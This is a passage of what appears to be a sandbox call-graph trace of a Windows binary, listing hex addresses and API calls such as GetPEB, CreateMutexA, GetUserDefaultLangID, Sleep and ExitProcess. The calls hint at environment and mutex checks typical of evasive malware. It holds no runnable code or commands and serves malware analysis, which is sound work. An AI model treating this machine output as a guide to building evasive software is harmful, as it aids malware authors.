46589->46590 46593 7edc2370 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46589->46593 46590->46578 46592->46589 46593->46590 46594->46571 46595->46427 46596->46431 46597->46433 46598->46444 46599->46445 46600->46461 46601->46461 46602->46445 46603->46445 46604->46445 46605->46445 46606->46445 46607->46454 46608->46462 46609->46462 46610->46462 46612 7edb2dad 46611->46612 46614 7edb2d28 swprintf 46611->46614 46612->45637 46973 7ee02f6c 29 API calls 46614->46973 46974 7eda7130 46615->46974 46622 7eddaf00 46623 7eda7130 47 API calls 46622->46623 46624 7eddaf28 46623->46624 46989 7edf8b90 46624->46989 46627 7eda7230 28 API calls 46628 7eddaf5f 46627->46628 46629 7edaa100 46628->46629 46630 7edaa12a 46629->46630 46631 7edaa170 46629->46631 46633 7eda6730 numpunct 28 API calls 46630->46633 46632 7edaa18c 46631->46632 46996 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46631->46996 46632->45644 46632->45645 46634 7edaa137 46633->46634 46994 7edc9fd0 28 API calls 2 library calls 46634->46994 46637 7edaa150 46995 7ee03f35 RaiseException 46637->46995 46639 7edaa161 46640 7edc5c10 std::ios_base::clear 26 API calls 46639->46640 46640->46631 46642 7ed945c9 46641->46642 46643 7ed9460e 46642->46643 46997 7eda86c0 49 API calls 3 library calls 46642->46997 46647 7ed94634 46643->46647 46648 7ed94685 46643->46648 46645 7ed945f7 46646 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46645->46646 46646->46643 46649 7eda6730 numpunct 28 API calls 46647->46649 46651 7eda6730 numpunct 28 API calls 46648->46651 46650 7ed94640 46649->46650 46998 7ed9a8f0 49 API calls 46650->46998 46653 7ed94699 46651->46653 46999 7ed94820 28 API calls std::ios_base::clear 46653->46999 46654 7ed94666 46656 7edc5c10 std::ios_base::clear 26 API calls 46654->46656 46658 7ed9467d 46656->46658 46657 7ed946bb 47000 7edca6c0 28 API calls 2 library calls 46657->47000 46658->45664 46660 7ed946e0 47001 7ee03f35 RaiseException 46660->47001 46662 7ed946f4 46663 7edc5c10 std::ios_base::clear 26 API calls 46662->46663 46664 7ed94700 46663->46664 46665 7edc5c10 std::ios_base::clear 26 API calls 46664->46665 46665->46658 46667 7edd8886 46666->46667 47002 7eda7700 46667->47002 46669 7edd88aa 47005 7eda7850 46669->47005 46671 7edd891c 47011 7edd89e0 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46671->47011 46672 7edd893a 47012 7edd89e0 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46672->47012 46673 7edd88f5 _Ptr_base 46673->46671 46673->46672 46676 7edd8938 std::ios_base::clear 46677 7edc5c10 std::ios_base::clear 26 API calls 46676->46677 46678 7edd8995 _Ptr_base 46677->46678 46679 7edc5c10 std::ios_base::clear 26 API calls 46678->46679 46680 7edd89c1 46679->46680 46680->45673 46682 7eddad7e 46681->46682 47036 7edc6f10 46682->47036 46686 7ed948bc numpunct 46685->46686 46687 7ed94901 46686->46687 47043 7edc5f10 28 API calls numpunct 46686->47043 47039 7eda6d50 46687->47039 46690 7ed9497b 46691 7eda9d80 46690->46691 46692 7eda9d9c 46691->46692 46694 7eda9d97 std::ios_base::clear 46691->46694 46693 7edc5c10 std::ios_base::clear 26 API calls 46692->46693 46693->46694 46694->45705 46696 7edf1d82 46695->46696 47045 7eda7030 46696->47045 46702 7edf1dd3 47064 7edb0780 46702->47064 46704 7edf1dfd 47068 7edab650 46704->47068 46706 7edf1e27 47072 7edaf720 46706->47072 46708 7edf1e51 46709 7edf1e62 GetPEB 46708->46709 46710 7edf1ec9 46709->46710 47076 7edb02e0 46710->47076 46712 7edf20ff 46713 7edf2110 GetPEB 46712->46713 46714 7edf2177 46713->46714 46715 7eda7030 59 API calls 46714->46715 46716 7edf23ad 46715->46716 47080 7edad400 46716->47080 46718 7edf23be 47084 7ed93d80 46718->47084 46723 7ed93d80 28 API calls 46724 7edf2406 46723->46724 46725 7ed93d80 28 API calls 46724->46725 46726 7edf240f 46725->46726 47096 7edade50 46726->47096 46728 7edf241f 46729 7ed93d80 28 API calls 46728->46729 46730 7edf244a 46729->46730 46731 7ed93d80 28 API calls 46730->46731 46928->45652 46929->45660 46931 7ed9d1ed 46930->46931 47287 7ed9d090 46931->47287 46933 7ed9d210 std::ios_base::clear 46934 7edc5c10 std::ios_base::clear 26 API calls 46933->46934 46935 7ed9d237 46934->46935 46936 7edca810 46935->46936 46937 7eda6300 std::ios_base::clear 28 API calls 46936->46937 46938 7edca869 46937->46938 47306 7edeffa0 46938->47306 46941 7eda6300 std::ios_base::clear 28 API calls 46942 7edca886 46941->46942 47310 7edf53b0 46942->47310 46945 7edc5c10 std::ios_base::clear 26 API calls 46946 7edca8aa 46945->46946 46947 7edc5c10 std::ios_base::clear 26 API calls 46946->46947 46948 7edca8b9 46947->46948 46948->45666 46949->45683 46951 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46950->46951 46952 7eda9cd1 46951->46952 46953 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46952->46953 46954 7eda9d53 46953->46954 46955 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 46954->46955 46956 7eda9d61 46955->46956 46957 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 46956->46957 46958 7eda9d6e 46957->46958 46958->45690 46959->45682 46960->45708 46973->46612 46975 7eda71a3 46974->46975 46977 7eda71b7 46974->46977 46987 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46975->46987 46978 7edf8ab0 46977->46978 46979 7edc71f0 46978->46979 46980 7edf8ac1 46978->46980 46982 7eda7230 46979->46982 46988 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46980->46988 46983 7eda6730 numpunct 28 API calls 46982->46983 46984 7eda7299 46983->46984 46985 7eda6730 numpunct 28 API calls 46984->46985 46986 7eda72a9 46985->46986 46986->46622 46987->46977 46988->46979 46990 7edf8ba1 46989->46990 46992 7eddaf30 46989->46992 46993 7ee117cd 47 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46990->46993 46992->46627 46993->46992 46994->46637 46995->46639 46996->46632 46997->46645 46998->46654 46999->46657 47000->46660 47001->46662 47013 7eda2050 47002->47013 47004 7eda771d _Ptr_base 47004->46669 47006 7eda78d7 _memcpy_s 47005->47006 47016 7ee1105c 47006->47016 47008 7eda78df _memcpy_s 47020 7eda66a0 47008->47020 47010 7eda7975 _Ptr_base 47010->46673 47011->46676 47012->46676 47014 7ee02c1b std::_Facet_Register 16 API calls 47013->47014 47015 7eda2064 _Ptr_base 47014->47015 47015->47004 47017 7ee11067 47016->47017 47023 7ee161c9 47017->47023 47028 7ed95560 47020->47028 47022 7eda670c 47022->47010 47024 7ee11077 47023->47024 47025 7ee161dc 47023->47025 47024->47008 47025->47024 47027 7ee1b2e0 7 API calls 3 library calls 47025->47027 47027->47024 47029 7ed95577 numpunct 47028->47029 47031 7ed95581 numpunct 47029->47031 47034 7edc5f10 28 API calls numpunct 47029->47034 47033 7ed9559a _memcpy_s 47031->47033 47035 7ed949c0 28 API calls 2 library calls 47031->47035 47033->47022 47034->47031 47035->47033 47037 7edc5f40 3 API calls 47036->47037 47038 7edc6f69 47037->47038 47038->45689 47040 7eda6e79 ctype 47039->47040 47042 7eda6de6 numpunct 47039->47042 47040->46690 47044 7ed949c0 28 API calls 2 library calls 47042->47044 47043->46687 47044->47040 47046 7eda705b 47045->47046 47156 7eda5ab0 47046->47156 47051 7eda9ef0 47253 7eda8a00 47051->47253 47053 7eda9f87 std::ios_base::_Ios_base_dtor 47055 7edc9cf0 std::ios_base::clear 28 API calls 47053->47055 47057 7edaa0d2 47055->47057 47257 7eda9b60 47057->47257 47060 7edb18c0 47062 7edb197d 47060->47062 47063 7edb18f8 swprintf 47060->47063 47062->46702 47264 7ee02f6c 29 API calls 47063->47264 47066 7edb084d 47064->47066 47067 7edb07c8 swprintf 47064->47067 47066->46704 47265 7ee02f6c 29 API calls 47067->47265 47069 7edab711 47068->47069 47071 7edab68c swprintf 47068->47071 47069->46706 47266 7ee02f6c 29 API calls 47071->47266 47073 7edaf7f9 47072->47073 47075 7edaf774 swprintf 47072->47075 47073->46708 47267 7ee02f6c 29 API calls 47075->47267 47077 7edb03d1 47076->47077 47078 7edb034c swprintf 47076->47078 47077->46712 47268 7ee02f6c 29 API calls 47078->47268 47081 7edad4b1 47080->47081 47083 7edad42c swprintf 47080->47083 47081->46718 47269 7ee02f6c 29 API calls 47083->47269 47086 7ed93dbe 47084->47086 47085 7eda8a00 28 API calls 47087 7ed93ecf 47085->47087 47086->47085 47088 7edc9cf0 std::ios_base::clear 28 API calls 47087->47088 47089 7ed941ef 47088->47089 47090 7eda9b60 28 API calls 47089->47090 47091 7ed9420a 47090->47091 47092 7ed93d00 47091->47092 47093 7ed93d24 47092->47093 47270 7ed991f0 47093->47270 47098 7edadf01 47096->47098 47099 7edade7c swprintf 47096->47099 47098->46728 47278 7ee02f6c 29 API calls 47099->47278 47158 7eda5adb 47156->47158 47165 7eda5bb0 47158->47165 47162 7eda6fa0 47247 7eda6180 47162->47247 47164 7eda6fb1 47164->47051 47166 7eda5bdb 47165->47166 47173 7eded170 47166->47173 47169 7eda6090 47170 7eda60bb 47169->47170 47171 7eda5b5b 47170->47171 47246 7ee026ed 9 API calls 2 library calls 47170->47246 47171->47162 47182 7edc3f30 47173->47182 47177 7eded1e3 47179 7eda5b43 47177->47179 47201 7ee026ed 9 API calls 2 library calls 47177->47201 47178 7eded19e 47178->47177 47193 7edc9cf0 47178->47193 47179->47169 47183 7edc9cf0 std::ios_base::clear 28 API calls 47182->47183 47184 7edc3fb2 47183->47184 47185 7ee02c1b std::_Facet_Register 16 API calls 47184->47185 47186 7edc3fb9 47185->47186 47188 7edc3fd3 47186->47188 47202 7ee021e4 24 API calls 5 library calls 47186->47202 47189 7edf9ba0 47188->47189 47190 7edf9bdd 47189->47190 47203 7eda5610 47190->47203 47192 7edf9bf9 std::ios_base::_Ios_base_dtor 47192->47178 47194 7edc9d7c 47193->47194 47195 7edc9d19 47193->47195 47194->47177 47197 7edc9d2a std::ios_base::clear 47195->47197 47243 7ee03f35 RaiseException 47195->47243 47244 7eda8350 28 API calls 2 library calls 47197->47244 47199 7edc9d6e 47245 7ee03f35 RaiseException 47199->47245 47201->47179 47202->47188 47217 7ee01dcc 47203->47217 47207 7eda5655 47216 7eda5677 47207->47216 47236 7edc36c0 57 API calls 2 library calls 47207->47236 47209 7eda5730 47209->47192 47211 7eda568f 47212 7eda569e 47211->47212 47213 7eda5697 47211->47213 47238 7ee021b2 16 API calls std::_Facet_Register 47212->47238 47237 7edc55b0 RaiseException Concurrency::cancel_current_task 47213->47237 47229 7ee01e24 47216->47229 47218 7ee01de2 47217->47218 47219 7ee01ddb 47217->47219 47220 7eda563c 47218->47220 47240 7ee02850 EnterCriticalSection 47218->47240 47239 7ee118ff 6 API calls 2 library calls 47219->47239 47223 7edaa980 47220->47223 47224 7edaa991 47223->47224 47225 7edaa9c5 47223->47225 47226 7ee01dcc std::_Lockit::_Lockit 7 API calls 47224->47226 47225->47207 47227 7edaa99b 47226->47227 47228 7ee01e24 std::_Lockit::~_Lockit 2 API calls 47227->47228 47228->47225 47230 7ee1190d 47229->47230 47231 7ee01e2e 47229->47231 47242 7ee118e8 LeaveCriticalSection 47230->47242 47232 7ee01e41 47231->47232 47241 7ee0285e LeaveCriticalSection 47231->47241 47232->47209 47235 7ee11914 47235->47209 47236->47211 47237->47216 47238->47216 47239->47220 47240->47220 47241->47232 47242->47235 47243->47197 47244->47199 47245->47194 47246->47171 47248 7ee02c1b std::_Facet_Register 16 API calls 47247->47248 47249 7eda6226 47248->47249 47251 7eda6240 47249->47251 47252 7ee021e4 24 API calls 5 library calls 47249->47252 47251->47164 47252->47251 47254 7eda8a4b 47253->47254 47256 7eda8a9a 47254->47256 47262 7eddd390 28 API calls std::ios_base::clear 47254->47262 47256->47053 47261 7eda5750 57 API calls 5 library calls 47256->47261 47258 7eda9b83 47257->47258 47259 7eda9bac 47258->47259 47263 7edc5200 28 API calls std::ios_base::clear 47258->47263 47259->47060 47261->47053 47262->47256 47263->47259 47264->47062 47265->47066 47266->47069 47267->47073 47268->47077 47269->47081 47271 7ed99248 47270->47271 47272 7eda8a00 28 API calls 47271->47272 47276 7ed992c8 47272->47276 47273 7edc9cf0 std::ios_base::clear 28 API calls 47274 7ed995ab 47273->47274 47275 7eda9b60 28 API calls 47274->47275 47277 7ed93d6d 47275->47277 47276->47273 47277->46723 47278->47098 47288 7ed9d0b3 47287->47288 47289 7ed9d156 47288->47289 47290 7eda6730 numpunct 28 API calls 47288->47290 47292 7eda9de0 28 API calls 47289->47292 47291 7ed9d0e6 47290->47291 47303 7ed94820 28 API calls std::ios_base::clear 47291->47303 47294 7ed9d1a6 47292->47294 47294->46933 47295 7ed9d108 47304 7edca6c0 28 API calls 2 library calls 47295->47304 47297 7ed9d12a 47305 7ee03f35 RaiseException 47297->47305 47299 7ed9d13b 47300 7edc5c10 std::ios_base::clear 26 API calls 47299->47300 47301 7ed9d147 47300->47301 47302 7edc5c10 std::ios_base::clear 26 API calls 47301->47302 47302->47289 47303->47295 47304->47297 47305->47299 47307 7edeffb3 47306->47307 47308 7edc5c10 std::ios_base::clear 26 API calls 47307->47308 47309 7edca871 47308->47309 47309->46941 47313 7edf53fb 47310->47313 47311 7eda6730 numpunct 28 API calls 47312 7edf551e 47311->47312 47314 7edc5c10 std::ios_base::clear 26 API calls 47312->47314 47313->47311 47315 7edca892 47314->47315 47315->46945 47316 6cf5eed0 47317 6cf5f118 47316->47317 47327 6cef11d0 47317->47327 47319 6cf5f30a AnyPopup 47320 6cf5f495 47319->47320 47323 6cf5f323 47319->47323 47330 6cef14a0 StrCmpIW 47320->47330 47322 6cf5f4a4 47331 6cef16e0 StrCmpIW 47322->47331 47325 6cf5f4b6 GetTickCount 47325->47323 47332 6cef1210 47327->47332 47329 6cef11fe CreateThread 47329->47319 47339 6cf20d90 47329->47339 47330->47322 47331->47325 47335 6cef1c70 47332->47335 47334 6cef121e 47334->47329 47338 6cf4d3d0 GetPEB 47335->47338 47337 6cef1c7c 47337->47334 47338->47337 47340 6cf20faf 47339->47340 47341 7edc87e6 47342 7edc87ed GetPEB 47341->47342 47343 7edc891a PathIsDirectoryW 47342->47343 47345 7edc8ace 47343->47345 47351 7ede2bb0 lstrlenW GetCommandLineW swprintf 47345->47351 47347 7edc8ae3 swprintf 47348 7edc90fd GetDialogBaseUnits 47347->47348 47350 7edc9190 swprintf 47348->47350 47349 7edc9382 GetLargePageMinimum 47349->47350 47350->47349 47351->47347 47352 7edff514 47353 7edff520 swprintf 47352->47353 47357 7edbf220 47353->47357 47355 7edff5f4 ExitProcess 47358 7edbf425 swprintf 47357->47358 47359 7edbf4b8 CreateMutexA GetLastError 47358->47359 47361 7edc21b8 swprintf 47359->47361 47364 7edbf578 47359->47364 47360 7edbfaad GetModuleHandleA 47365 7edbfb33 swprintf 47360->47365 47361->47355 47362 7edc0093 GetUserDefaultLangID 47366 7edc00a9 swprintf 47362->47366 47363 7edbf621 swprintf 47363->47360 47364->47363 47365->47362 47365->47366 47367 7edc0654 GetShellWindow 47366->47367 47368 7edc06c5 47367->47368 47369 7ede3180 5 API calls 47368->47369 47375 7edc0758 swprintf 47368->47375 47371 7edc072a 47369->47371 47371->47375 47390 7ede60e0 5 API calls swprintf 47371->47390 47372 7edc0b7d 47373 7edc0b90 IsValidCodePage 47372->47373 47377 7edc0ba4 swprintf 47372->47377 47373->47377 47391 7ede2bb0 lstrlenW GetCommandLineW swprintf 47375->47391 47392 7ede0490 GetFocus GetWindowDC lstrlenA IsWow64Message swprintf 47377->47392 47378 7edc0ebb swprintf 47378->47361 47393 7ede2bb0 lstrlenW GetCommandLineW swprintf 47378->47393 47380 7edc1099 swprintf 47394 7eddea20 lstrlenA IsWow64Message swprintf 47380->47394 47382 7edc1636 swprintf 47383 7edc1ab1 GetFocus 47382->47383 47385 7edc1e0a swprintf 47382->47385 47384 7edc1ac0 IsWindow IsWindowEnabled IsWindowUnicode 47383->47384 47387 7edc1af0 swprintf 47383->47387 47384->47387 47385->47361 47395 7ede6ac0 GetShellWindow lstrlenA IsWow64Message lstrlenW swprintf 47385->47395 47387->47355 47388 7edc2152 CloseHandle 47388->47361 47389 7edc1f13 swprintf 47389->47388 47390->47375 47391->47372 47392->47378 47393->47380 47394->47382 47395->47389 47396 7edbae34 47397 7edbae5a 47396->47397 47398 7ed945a0 49 API calls 47397->47398 47399 7edbaeca 47398->47399 47861 7ed944b0 47399->47861 47401 7edbd7e9 47402 7eda6730 numpunct 28 API calls 47401->47402 47403 7edbd94b 47402->47403 47404 7eda6300 std::ios_base::clear 28 API calls 47403->47404 47405 7edbd96c 47404->47405 47406 7eda6300 std::ios_base::clear 28 API calls 47405->47406 47407 7edbd99e 47406->47407 47408 7eda6300 std::ios_base::clear 28 API calls 47407->47408 47410 7edbd9bf 47408->47410 47409 7edbaed0 swprintf 47409->47401 47411 7ed945a0 49 API calls 47409->47411 47412 7eda6300 std::ios_base::clear 28 API calls 47410->47412 47413 7edbb002 47411->47413 47414 7edbd9e0 47412->47414 48193 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47413->48193 47416 7ede9e70 49 API calls 47414->47416 47418 7edbd9f6 47416->47418 47417 7edbb008 47421 7ed945a0 49 API calls 47417->47421 47550 7edbb1e1 47417->47550 47419 7eda6300 std::ios_base::clear 28 API calls 47418->47419 47422 7edbda17 47419->47422 47420 7ed945a0 49 API calls 47423 7edbb35e 47420->47423 47424 7edbb036 47421->47424 47425 7eda6300 std::ios_base::clear 28 API calls 47422->47425 48194 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47423->48194 47427 7ed9d1c0 28 API calls 47424->47427 47428 7edbda38 47425->47428 47438 7edbb04e 47427->47438 47868 7edee5d0 47428->47868 47430 7edbb364 47433 7ed945a0 49 API calls 47430->47433 47583 7edbb541 47430->47583 47432 7eda9cc0 49 API calls 47435 7edbda59 GetPEB 47432->47435 47436 7edbb392 47433->47436 47434 7ed945a0 49 API calls 47437 7edbb6ab 47434->47437 47459 7edbdb18 47435->47459 47439 7ed9d1c0 28 API calls 47436->47439 48195 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47437->48195 47441 7ed945a0 49 API calls 47438->47441 47449 7edbb3aa 47439->47449 47443 7edbb0a2 47441->47443 47442 7edbb6b1 47445 7ed945a0 49 API calls 47442->47445 47606 7edbb83e 47442->47606 47444 7ed9d1c0 28 API calls 47443->47444 47446 7edbb0ba 47444->47446 47450 7edbb6d9 47445->47450 47451 7eda6300 std::ios_base::clear 28 API calls 47446->47451 47447 7ed945a0 49 API calls 47448 7edbb98c 47447->47448 48199 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47448->48199 47453 7ed945a0 49 API calls 47449->47453 48196 7ed94730 28 API calls 47450->48196 47455 7edbb0de 47451->47455 47457 7edbb400 47453->47457 47458 7eda6300 std::ios_base::clear 28 API calls 47455->47458 47456 7edbb992 47463 7ed945a0 49 API calls 47456->47463 47633 7edbbb1f 47456->47633 47460 7ed9d1c0 28 API calls 47457->47460 47461 7edbb110 47458->47461 47471 7edbdccc Sleep 47459->47471 47464 7edbb418 47460->47464 47465 7eda6300 std::ios_base::clear 28 API calls 47461->47465 47462 7ed945a0 49 API calls 47466 7edbbc6d 47462->47466 47467 7edbb9ba 47463->47467 47468 7eda6300 std::ios_base::clear 28 API calls 47464->47468 47470 7edbb131 47465->47470 48203 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47466->48203 48200 7ed94730 28 API calls 47467->48200 47474 7edbb43e 47468->47474 47469 7edbb6e0 47475 7ed945a0 49 API calls 47469->47475 47476 7eda6300 std::ios_base::clear 28 API calls 47470->47476 47477 7edb9c63 IsValidCodePage 47471->47477 47479 7eda6300 std::ios_base::clear 28 API calls 47474->47479 47480 7edbb726 47475->47480 47481 7edbb152 47476->47481 47491 7edb9c8e lstrlenA 47477->47491 47478 7edbbc73 47487 7ed945a0 49 API calls 47478->47487 47665 7edbbe00 47478->47665 47482 7edbb470 47479->47482 48197 7ed94730 28 API calls 47480->48197 47484 7ede9e70 49 API calls 47481->47484 47488 7eda6300 std::ios_base::clear 28 API calls 47482->47488 47490 7edbb168 47484->47490 47486 7ed945a0 49 API calls 47492 7edbbf4e 47486->47492 47493 7edbbc9b 47487->47493 47495 7edbb491 47488->47495 47489 7edbb72d 47496 7eda6300 std::ios_base::clear 28 API calls 47489->47496 47497 7eda6300 std::ios_base::clear 28 API calls 47490->47497 47498 7edb9d86 GetWindowTextLengthA 47491->47498 48207 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47492->48207 48204 7ed94730 28 API calls 47493->48204 47494 7edbb9c1 47501 7ed945a0 49 API calls 47494->47501 47502 7eda6300 std::ios_base::clear 28 API calls 47495->47502 47503 7edbb74e 47496->47503 47504 7edbb189 47497->47504 47505 7edb9dc5 47498->47505 47507 7edbba07 47501->47507 47508 7edbb4b2 47502->47508 47509 7eda6300 std::ios_base::clear 28 API calls 47503->47509 47510 7eda6300 std::ios_base::clear 28 API calls 47504->47510 47506 7edbbf54 47519 7ed945a0 49 API calls 47506->47519 47698 7edbc0e1 47506->47698 48201 7ed94730 28 API calls 47507->48201 47512 7ede9e70 49 API calls 47508->47512 47513 7edbb780 47509->47513 47514 7edbb1aa 47510->47514 47515 7edbb4c8 47512->47515 47516 7eda6300 std::ios_base::clear 28 API calls 47513->47516 47517 7edee5d0 107 API calls 47514->47517 47521 7eda6300 std::ios_base::clear 28 API calls 47515->47521 47522 7edbb7a1 47516->47522 47523 7edbb1ba 47517->47523 47518 7ed945a0 49 API calls 47524 7edbc22f 47518->47524 47525 7edbbf7c 47519->47525 47520 7edbba0e 47527 7eda6300 std::ios_base::clear 28 API calls 47520->47527 47529 7edbb4e9 47521->47529 47530 7eda6300 std::ios_base::clear 28 API calls 47522->47530 47531 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 47523->47531 48211 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47524->48211 48208 7ed94730 28 API calls 47525->48208 47526 7edbbca2 47534 7ed945a0 49 API calls 47526->47534 47528 7edbba2f 47527->47528 47535 7eda6300 std::ios_base::clear 28 API calls 47528->47535 47536 7eda6300 std::ios_base::clear 28 API calls 47529->47536 47537 7edbb7c2 47530->47537 47538 7edbb1ce 47531->47538 47540 7edbbce8 47534->47540 47542 7edbba61 47535->47542 47543 7edbb50a 47536->47543 47544 7ede9e70 49 API calls 47537->47544 47545 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 47538->47545 47539 7edbc235 47552 7ed945a0 49 API calls 47539->47552 47732 7edbc3c2 47539->47732 48205 7ed94730 28 API calls 47540->48205 47547 7eda6300 std::ios_base::clear 28 API calls 47542->47547 47548 7edee5d0 107 API calls 47543->47548 47549 7edbb7d8 47544->47549 47545->47550 47546 7edbbcef 47554 7eda6300 std::ios_base::clear 28 API calls 47546->47554 47555 7edbba82 47547->47555 47556 7edbb51a 47548->47556 47557 7eda6300 std::ios_base::clear 28 API calls 47549->47557 47550->47420 47551 7ed945a0 49 API calls 47558 7edbc510 47551->47558 47559 7edbc25d 47552->47559 47553 7edbbf83 47560 7ed945a0 49 API calls 47553->47560 47561 7edbbd10 47554->47561 47562 7eda6300 std::ios_base::clear 28 API calls 47555->47562 47563 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 47556->47563 47564 7edbb7f9 47557->47564 48215 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47558->48215 48212 7ed94730 28 API calls 47559->48212 47567 7edbbfc9 47560->47567 47568 7eda6300 std::ios_base::clear 28 API calls 47561->47568 47569 7edbbaa3 47562->47569 47570 7edbb52e 47563->47570 47571 7eda6300 std::ios_base::clear 28 API calls 47564->47571 48209 7ed94730 28 API calls 47567->48209 47574 7edbbd42 47568->47574 47575 7ede9e70 49 API calls 47569->47575 47576 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 47570->47576 47577 7edbb81a 47571->47577 47572 7edbc516 47578 7edbc6a3 47572->47578 47579 7ed945a0 49 API calls 47572->47579 47581 7eda6300 std::ios_base::clear 28 API calls 47574->47581 47582 7edbbab9 47575->47582 47576->47583 47584 7edee5d0 107 API calls 47577->47584 47585 7ed945a0 49 API calls 47578->47585 47586 7edbc53e 47579->47586 47580 7edbbfd0 47588 7eda6300 std::ios_base::clear 28 API calls 47580->47588 47589 7edbbd63 47581->47589 47590 7eda6300 std::ios_base::clear 28 API calls 47582->47590 47583->47434 47591 7edbb82a 47584->47591 47592 7edbc7f1 47585->47592 48216 7ed94730 28 API calls 47586->48216 47587 7edbc264 47595 7ed945a0 49 API calls 47587->47595 47596 7edbbff1 47588->47596 47597 7eda6300 std::ios_base::clear 28 API calls 47589->47597 47598 7edbbada 47590->47598 48198 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47591->48198 48220 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47592->48220 47602 7edbc2aa 47595->47602 47603 7eda6300 std::ios_base::clear 28 API calls 47596->47603 47604 7edbbd84 47597->47604 47605 7eda6300 std::ios_base::clear 28 API calls 47598->47605 47600 7edbc7f7 47607 7edbc984 47600->47607 47614 7ed945a0 49 API calls 47600->47614 47601 7edbc545 48217 7edbe090 34 API calls std::ios_base::clear 47601->48217 48213 7ed94730 28 API calls 47602->48213 47610 7edbc023 47603->47610 47611 7ede9e70 49 API calls 47604->47611 47612 7edbbafb 47605->47612 47606->47447 47613 7ed945a0 49 API calls 47607->47613 47617 7eda6300 std::ios_base::clear 28 API calls 47610->47617 47618 7edbbd9a 47611->47618 47619 7edee5d0 107 API calls 47612->47619 47620 7edbcad2 47613->47620 47621 7edbc81f 47614->47621 47615 7edbc54a 47628 7ed945a0 49 API calls 47615->47628 47616 7edbc2b1 47622 7eda6300 std::ios_base::clear 28 API calls 47616->47622 47623 7edbc044 47617->47623 47624 7eda6300 std::ios_base::clear 28 API calls 47618->47624 47625 7edbbb0b 47619->47625 48224 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47620->48224 48221 7ed94730 28 API calls 47621->48221 47629 7edbc2d2 47622->47629 47630 7eda6300 std::ios_base::clear 28 API calls 47623->47630 47631 7edbbdbb 47624->47631 48202 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47625->48202 47635 7edbc58b 47628->47635 47636 7eda6300 std::ios_base::clear 28 API calls 47629->47636 47637 7edbc065 47630->47637 47638 7eda6300 std::ios_base::clear 28 API calls 47631->47638 47633->47462 47634 7edbcad8 47639 7edbcc65 47634->47639 47646 7ed945a0 49 API calls 47634->47646 48218 7ed94730 28 API calls 47635->48218 47641 7edbc304 47636->47641 47642 7ede9e70 49 API calls 47637->47642 47643 7edbbddc 47638->47643 47645 7ed945a0 49 API calls 47639->47645 47648 7eda6300 std::ios_base::clear 28 API calls 47641->47648 47649 7edbc07b 47642->47649 47644 7edee5d0 107 API calls 47643->47644 47650 7edbbdec 47644->47650 47651 7edbcdb3 47645->47651 47652 7edbcb00 47646->47652 47647 7edbc592 47654 7eda6300 std::ios_base::clear 28 API calls 47647->47654 47655 7edbc325 47648->47655 47656 7eda6300 std::ios_base::clear 28 API calls 47649->47656 48206 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47650->48206 48228 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47651->48228 48225 7ed94730 28 API calls 47652->48225 47653 7edbc826 47661 7ed945a0 49 API calls 47653->47661 47662 7edbc5b3 47654->47662 47663 7eda6300 std::ios_base::clear 28 API calls 47655->47663 47657 7edbc09c 47656->47657 47664 7eda6300 std::ios_base::clear 28 API calls 47657->47664 47667 7edbc86c 47661->47667 47668 7eda6300 std::ios_base::clear 28 API calls 47662->47668 47669 7edbc346 47663->47669 47671 7edbc0bd 47664->47671 47665->47486 47666 7edbcdb9 47672 7edbcf46 47666->47672 47678 7ed945a0 49 API calls 47666->47678 48222 7ed94730 28 API calls 47667->48222 47674 7edbc5e5 47668->47674 47670 7ede9e70 49 API calls 47669->47670 47675 7edbc35c 47670->47675 47676 7edee5d0 107 API calls 47671->47676 47677 7ed945a0 49 API calls 47672->47677 47680 7eda6300 std::ios_base::clear 28 API calls 47674->47680 47682 7eda6300 std::ios_base::clear 28 API calls 47675->47682 47683 7edbc0cd 47676->47683 47684 7edbd094 47677->47684 47685 7edbcde1 47678->47685 47679 7edbc873 47687 7eda6300 std::ios_base::clear 28 API calls 47679->47687 47681 7edbc606 47680->47681 47688 7eda6300 std::ios_base::clear 28 API calls 47681->47688 47689 7edbc37d 47682->47689 48210 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47683->48210 48233 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47684->48233 48229 7ed94730 28 API calls 47685->48229 47686 7edbcb07 47693 7ed945a0 49 API calls 47686->47693 47694 7edbc894 47687->47694 47696 7edbc627 47688->47696 47697 7eda6300 std::ios_base::clear 28 API calls 47689->47697 47701 7edbcb4d 47693->47701 47695 7eda6300 std::ios_base::clear 28 API calls 47694->47695 47702 7edbc8c6 47695->47702 47703 7ede9e70 49 API calls 47696->47703 47704 7edbc39e 47697->47704 47698->47518 47699 7edbd09a 47705 7edbd227 47699->47705 47713 7ed945a0 